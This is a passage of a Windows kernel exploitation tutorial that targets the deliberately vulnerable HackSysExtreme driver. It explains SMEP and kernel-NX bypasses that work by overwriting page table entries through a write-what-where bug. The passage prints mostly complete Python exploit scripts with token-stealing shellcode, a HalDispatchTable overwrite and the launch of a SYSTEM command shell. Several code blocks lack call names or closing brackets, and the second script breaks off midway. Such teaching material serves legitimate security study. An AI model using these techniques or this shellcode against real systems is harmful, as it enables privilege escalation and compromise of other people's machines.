# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.

Sorry for the poor screenshot above in advance.

But as we can see, our version of the formula works - and we know can now dynamically fetch a PTE address! The only question remains, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. Since the write portion of the write-what-where writes a POINTER (a.k.a the write will take a memory address and dereference it - which results in extracting the contents of a pointer), we will write the value of nt!MiGetPteAddress+0x13 somewhere we control. The write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The β€œwhere” value in the write-what-were vulnerability will write the β€œwhat” value (base of the PTEs) to a pointer (a.k.a if the β€œwhat” value (base of the PTEs) gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the β€œwhat” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create - we can then dereference our pointer and extract the contents ourselves!

Here is how this all looks in Python!

First, we declare a structure (one member for the β€œwhat” value, one member for the β€œwhere” value)

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note - your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our β€œwhat” value and our β€œwhere” value which writes what the actual address of nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything - we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a β€œwhat” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for β€œwhat” and one member for β€œwhere”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes - resulting in the extraction of the PTE control bits!

Awesome! All that is left now that is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract the extracted PTE control bits by 4.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now we have successfully gotten the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcodes PTE user control bit with a supervisor control bit..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")


Rinse and Repeat

Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten in his research suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarly to how ROP works in user mode.

The concept of ROP in user mode is the idea that we have the ability to write shellcode to the stack, we just don’t have the ability to execute it. Using ROP, we can change the permissions of the stack to that of executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primtives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The questions still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last structures that many people used for kASLR bypasses, was the lack of randomization of the HAL heap. The HAL heap used to contain a pointer to the kernel AND be static, but no longer is static.

Although everything is dynamically based, there is still a structure that remains which is static, KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and compensate any odd numbering with NULL bytes.
  2. Write each line of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808,KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written the data type chosen was that of a c_ulonglong() - as it was easy to store into a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated 9 times, until all of the shellcode was written.

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4 - we are going to use bitwise AND per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)

# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)

Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                       # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = KUSER_SHARED_DATA + 0x800 >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
